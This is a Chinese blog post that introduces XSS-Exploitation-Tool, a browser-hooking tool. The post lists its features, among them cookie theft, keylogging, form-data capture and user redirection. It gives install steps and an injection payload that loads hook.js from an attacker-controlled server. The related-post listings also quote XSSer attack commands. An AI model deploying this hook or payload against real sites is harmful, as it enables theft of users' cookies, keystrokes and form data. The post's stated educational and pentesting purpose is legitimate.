这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具

最新推荐文章于 2025-04-21 11:27:45 发布
最新推荐文章于 2025-04-21 11:27:45 发布
阅读量2.8k 收藏 16
点赞数 2
文章标签: 自动化 xss 运维 web安全 网络安全 黑客 网络空间安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/131867368
版权

一、XSS-Exploitation-Tool简介

跨站脚本(XSS)是一种常见的网络安全漏洞,它允许攻击者在目标网站上注入恶意的客户端代码,从而影响或者控制目标用户的浏览器行为。XSS漏洞可能导致用户的隐私泄露、账号被盗、网站被篡改等严重后果。

为了帮助渗透测试人员和安全研究人员快速地识别和利用XSS漏洞,我们开发了XSS-Exploitation-Tool,这是一款功能强大的XSS漏洞扫描与利用工具,专为渗透测试人员设计。

需要注意的是,该工具仅出于教育目的设计和开发,请不要将其用于真实环境。

二、XSS-Exploitation-Tool功能介绍

XSS-Exploitation-Tool具有以下功能:

功能说明
获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息
获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息
获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图
获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码
提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据
获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据
键盘记录功能可以记录目标用户在浏览器中输入的所有按键
显示警告弹窗可以在目标用户的浏览器中显示一个自定义的警告弹窗
重定向用户可以将目标用户的浏览器重定向到一个自定义的网址

三、XSS-Exploitation-Tool安装方法

当前版本的XSS-Exploitation-Tool已在Debian 11上进行过测试。

在使用该工具之前,你还需要安装Apache、MySQL数据库和PHP相关模块:

# 安装Apache、MySQL数据库和PHP相关模块
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom

# 删除默认的index.html文件
$ sudo rm /var/www/index.html

接下来,你可以直接使用下列命令将该项目源码克隆至本地:

# 安装git
$ sudo apt-get install git

# 克隆项目源码
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git

# 移动项目源码到/var/www/html/目录下
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

然后安装composer,并安装该工具所需的其他依赖组件:

# 安装composer
$ sudo apt-get install composer

# 进入/var/www/html/目录
$ cd /var/www/html/

# 修改文件夹权限
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/

# 安装依赖组件
$ composer install

# 恢复文件夹权限
$ sudo chown -R www-data:$www-data /var/www/

安装完成后,使用下列命令初始化数据库:

# 进入MySQL数据库
$ sudo mysql

# 创建一个新的用户
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';

# 刷新权限
MariaDB [(none)]> flush privileges;

# 退出MySQL数据库
MariaDB [(none)]> quit

创建好数据库之后,访问下列地址即可:

http://server-ip/reset_database.php

四、XSS-Exploitation-Tool使用方法

使用XSS-Exploitation-Tool的过程可以分为以下几个步骤:

  • 步骤一:创建一个页面来插入JavaScript钩子文件。JavaScript钩子文件是一个用于与服务器端通信和执行命令的脚本文件,我们需要使用服务器端的IP地址替换文件中的第一行数据:

    // 修改服务器端IP地址
var address = "your server ip";

    然后,我们可以在任意一个网页上插入这个钩子文件,例如:

    ?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

  • 步骤二:等待目标用户访问这个设置了钩子文件的页面。当目标用户访问这个页面时,他们的浏览器就会加载并执行这个钩子文件,从而与服务器端建立连接,并发送一些基本的信息,如浏览器类型、版本、语言等。

  • 步骤三:在服务器端查看目标浏览器列表。当服务器端收到目标用户的信息时,它就会在网页上列出目标浏览器列表,我们可以点击每个浏览器的ID来查看更多的信息,如操作系统、地理位置、网页快照等。

  • 步骤四:在服务器端发送命令给目标浏览器。当我们选择了一个目标浏览器后,我们就可以在网页上输入一些命令来控制目标浏览器,如获取Cookie数据、显示警告弹窗、重定向用户等。我们可以在命令框中输入help来查看可用的命令列表。

工具运行截图

在这里插入图片描述
在这里插入图片描述

许可证协议 本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址 XSS-Exploitation-Tool:【GitHub传送门】

XSS漏洞扫描器(2种方法)
哆啦安全
12-14 5479
​1.使用ppmap检测利用XSS漏洞 sudo apt-get install chromium ​ sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt...
渗透测试之-XSS 工具推荐
浩策盾悟
01-10 7228
2 伪造一个html页面 写好攻击页面,发送给被攻击者客户端,发给他或者下载,让他触发你的攻击代码,让他输入用户名密码,自动就发送用户cookie发送黑客的网站。针对的是放射性的xss。1 如果是没保存 输出了 确实有xss 那么其他用户是一个新的页面,其他用户看到还是没有攻击的页面,这个时候需要让别人受到攻击咋办,这个时候是没办法插入数据到服务器的。服务端通过这样的方式 就可以把< html特殊符号 就把
xss漏洞扫描工具
03-12
它可以分析使用HTTPHTTPS协议进行通信的应用程序,可以用最简单地形式记录它观察的会话,并允许操作人员以各种方 式观查会话。如果你需要观察一个基于HTTP(S)应用程序的运行状态,可以满足你这种需要。不管是助开发人员调试其它方面 的难题,还是允许安全专业人员识别漏洞,它都是一款不错的工具
【2024版】最新推荐好用的XSS漏洞扫描利用工具_xss扫描工具
hackeroink的博客
12-18 1254
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
XSS详解
最新发布
wangzhemvp的博客
04-21 617
主要时xssplatform开发较早已经不更新了,所以还是用的之前的php版本。接着我们执行一条sql语句,因为xss数据库里面的sql文件里面的站点域名是作者的,我们将其更新替换成自己的。这里用的别人的图,数据库名用xssplatform,前面的config.php对应;注册成功了之后我们到phpmyadmin的xss数据库里面将admin升级成管理员。访问http://127.0.0.1/xss,注册admin/123456。下载了之后,将其解压在www目录下的XSS目录下。执行后可以看到更新成功。
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
推荐好用的XSS漏洞扫描利用工具
m0_71744044的博客
08-07 1365
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
XSS漏洞自动化攻击工具XSSer
weixin_34018169的博客
08-30 1041
2019独角兽企业重金招聘Python工程师标准>>> ...
BeefAuto自动化工具:无需配置实现远程XSS攻击
资源摘要信息:"BeefAuto是一个自动化工具,旨在简化Beef(Browser Exploitation Framework)的使用,使得用户无需手动配置路由器即可通过广域网(WAN)访问Beef。Beef是一个常用于网络钓鱼攻击的平台,它通过在受害...
xss exploitation tool
08-21
XSS Exploitation Tool通常提供了一些功能,比如自动发现目标网站的潜在漏洞、生成恶意脚本代码、利用漏洞进行攻击、窃取用户敏感信息等。这些工具可通过模拟攻击,助网站或应用程序的开发者识别修复XSS漏洞,以...
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1139
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
Fiddler+X5S(XSS漏洞扫描,抓包)工具
09-22
Fiddler+X5S(XSS漏洞扫描,抓包)工具 Fiddler 是用C#写出来的,它包含一个简单却功能强大的基于JScript .NET 事件脚本子系统,它的灵活性非常棒,可以支持众多的http调试任务,并且能够使用.net框架语言进行扩展。 Fiddler支持断点调试技术,当你在软件的菜单—rules—automatic breakpoints选项选择before request,或者当这些请求或响应属性能够跟目标的标准相匹配,Fiddler就能够暂停Http通讯,并且允许修改请求响应。这种功能对于安全测试是非常有用的,当然也可以用来做一般的功能测试,因为所有的代码路径都可以用来演习。 通过显示所有的Http通讯,Fiddler可以轻松地演示哪些用来生成一个页面,通过统计页面(就是Fiddler左边的那个大框)用户可以很轻松地使用多选,来得到一个WEB页面的“总重量”(页面文件以及相关js,css等)你也可以很轻松地看到你请求的某个页面,总共被请求了多少次,以及多少字节被转化了。 用户可以加入一个Inspector插件对象,来使用.net下的任何语言来编写Fiddler扩展。RequestInspectors ResponseInspectors提供一个格式规范的,或者是被指定的(用户自定义)Http请求响应视图。 另外,通过暴露HTTP头,用户可以看见哪些页面被允许在客户端或者是代理端进行缓存。如果要是一个响应没有包含Cache-Control 头,那么他就不会被缓存在客户端。 同类的工具: httpwatch, firebug, wireshark。
XSS漏洞扫描 XSS漏洞扫描
07-08
XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描
Python-XSSCon一个用python37实现功能强大XSS扫描工具
08-10
XSSCon: 一个用python 3.7实现功能强大XSS扫描工具
toxssin:一款功能强大XSS漏洞扫描利用Payload生成工具
顶峰
02-15 1519
toxssin支持拦截下列内容:cookie键盘击键数据粘贴事件输入修改事件文件选择表单提交服务器响应表单数据toxssin还支持下列功能:1、尝试在用户浏览网站时通过拦截http请求响应并重写文档来实现XSS持久化;2、支持会话管理,这意味着,您可以使用它来利用反射型存储型XSS;3、支持针对会话的自定义JavaScript脚本执行;4、自动记录所有会话信息;
TamperIE - 一个小巧的XSS漏洞检测辅助工具
热门推荐
软件质量优化
01-21 1万+
有些开发人员喜欢在客户端进行用户输入的检查,这种方法其实是不安全的,因为跨站脚本攻击可以绕过客户端输入界面,利用一些工具来修改提交到服务器的字符串,从而达到跨站脚本攻击的目的。TamperIE就是此类的小工具之一(www.bayden.com)TamperIE安装后以插件的方式加载到IE浏览器中,监视IE浏览器服务器之间的HTTP通信,截获提交到服务器的HTTP语句,修改其中的数
php xss漏洞扫描工具,XSS漏洞扫描工具:XSpear
weixin_30851655的博客
03-17 1334
XSpear是一款基于RubyGems的的XSS漏洞扫描器。拥有常见的XSS漏洞扫描攻击测试功能。还可进行参数分析。XSS漏洞扫描主要特点基于模式匹配的XSS扫描检测alertconfirmprompt无头浏览器上的事件(使用Selenium)测试XSS保护旁路反射参数的请求/响应反射的参数过滤测试event handlerHTML tagSpecial Char测试盲XSS(使用XS...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值